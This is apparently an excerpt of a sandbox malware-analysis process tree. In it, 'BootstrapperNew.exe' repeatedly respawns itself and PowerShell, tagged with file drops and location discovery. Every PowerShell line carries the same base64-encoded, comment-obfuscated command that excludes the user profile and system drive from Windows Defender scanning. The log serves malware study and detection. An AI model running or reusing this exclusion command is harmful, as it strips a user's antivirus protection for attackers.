        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        69⤵
        Drops file in Windows directory
        
        PID:7352
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        70⤵
        System Location Discovery: System Language Discovery
        
        PID:7508
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        70⤵
        Drops file in Windows directory
        
        PID:7364
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        71⤵
        
        PID:8028
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        71⤵
        
        PID:8056
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        72⤵
        
        PID:5536
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        72⤵
        
        PID:8116
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        73⤵
        
        PID:2516
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        73⤵
        
        PID:7420
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        74⤵
        
        PID:7484
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        74⤵
        
        PID:6836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        75⤵
        
        PID:8020
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        75⤵
        
        PID:7836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        76⤵
        System Location Discovery: System Language Discovery
        
        PID:8000
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        76⤵
        
        PID:4700
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        77⤵
        
        PID:8052
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        77⤵
        
        PID:1272
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        78⤵
        
        PID:5244
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        78⤵
        Checks computer location settings
        Drops file in Windows directory
        
        PID:6388
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        79⤵
        
        PID:5000
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        79⤵
        
        PID:4996
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        80⤵
        System Location Discovery: System Language Discovery
        
        PID:4912
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        80⤵
        
        PID:6044
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        81⤵
        
        PID:3092
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        81⤵
        
        PID:2260
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        82⤵
        
        PID:7560
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        82⤵
        Checks computer location settings
        Drops file in Windows directory
        
        PID:2960
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        83⤵
        
        PID:4280
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        83⤵
        
        PID:2408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        84⤵
        
        PID:2760
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        84⤵
        
        PID:4908
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        85⤵
        
        PID:5316
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        85⤵
        
        PID:5504
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        86⤵
        
        PID:1956
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        86⤵
        
        PID:6064
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        87⤵
        
        PID:3060
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        87⤵
        Checks computer location settings
        Drops file in Windows directory
        
        PID:5268
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        88⤵
        
        PID:6540
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        88⤵
        
        PID:6660
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        89⤵
        
        PID:1664
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        89⤵
        
        PID:7468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        90⤵
        
        PID:6308
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        90⤵
        
        PID:6480
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        91⤵
        
        PID:6764
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        91⤵
        
        PID:6004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        92⤵
        
        PID:6688
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        92⤵
        
        PID:3496
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        93⤵
        
        PID:4908
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        93⤵
        Checks computer location settings
        
        PID:6408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        94⤵
        
        PID:6944
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        94⤵
        
        PID:5980
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        95⤵
        
        PID:5424
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        95⤵
        Drops file in Windows directory
        
        PID:3880
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        96⤵
        
        PID:2100
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        96⤵
        Checks computer location settings
        
        PID:4232
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        97⤵
        
        PID:6436
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        97⤵
        
        PID:5900
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        98⤵
        
        PID:7328
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        98⤵
        
        PID:2248
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        99⤵
        
        PID:4560
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        99⤵
        Checks computer location settings
        
        PID:3156
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        100⤵
        
        PID:6268
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        100⤵
        
        PID:2292
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        101⤵
        
        PID:5428
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        101⤵
        Checks computer location settings
        
        PID:3264
        
